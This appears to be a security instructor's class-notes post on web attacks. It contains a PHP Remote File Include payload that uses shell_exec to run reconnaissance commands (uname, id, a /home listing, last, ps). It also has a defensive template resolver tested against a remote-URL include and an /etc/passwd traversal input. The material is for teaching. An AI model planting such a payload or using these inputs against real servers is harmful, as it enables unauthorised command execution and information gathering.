Of course, if you aren’t one of my students you can still read this. 🙂
In class I showed some extra slides on SQL injection. They are here: http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited
Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it:
```php
<?php
$command='uname -a;id -a';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
echo "<hr size=3>";

$command='ls -lABF /home/';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
echo "<hr size=3>";

$command='last -10';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
echo "<hr size=3>";

$command='ps -aux';
echo "Running the '$command' command:";
$output=shell_exec($command);
echo "<pre>$output</pre>";
?>
```
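
For the defensive side of the RFI examples, here is an added sketch (not part of the class material) of an include path resolver that refuses anything except a local template file. The function name `resolve_template`, the temporary template directory, and the `files.example` URL are hypothetical, constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example: resolve a user-supplied page name to a local file, or null.
function resolve_template(string $requested, string $baseDir): ?string
{
    // Short plain names only: no scheme (http://, php://), no dots, no slashes.
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested) !== 1) {
        return null;
    }
    // realpath() returns false for missing files and resolves symlinks,
    // so the containment check below sees the real location.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved file must sit inside the template directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample: a temp directory holding one legitimate template.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home page';\n");

// Constructed inputs: one valid name, a remote URL, a traversal, a missing page.
$inputs = ['home', 'http://files.example/cmd.txt', '../../etc/passwd', 'missing'];
foreach ($inputs as $in) {
    $path = resolve_template($in, $dir);
    printf("%-30s => %s\n", $in, $path === null ? 'rejected' : 'include ' . basename($path));
}

// Defence in depth: remote wrappers for include/require should be off in php.ini.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('warning: allow_url_include is enabled');
}

// Remove the constructed sample files.
unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Only `home` resolves to a file; the other three inputs are rejected before any `include` would run.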
There were also some YouTube videos I referred to in class:
- https://www.youtube.com/watch?v=NN75im_us4k
- https://www.youtube.com/watch?v=OUuX8_eDvic
- https://www.youtube.com/watch?v=rHTjwPI3lVQ
Enjoy!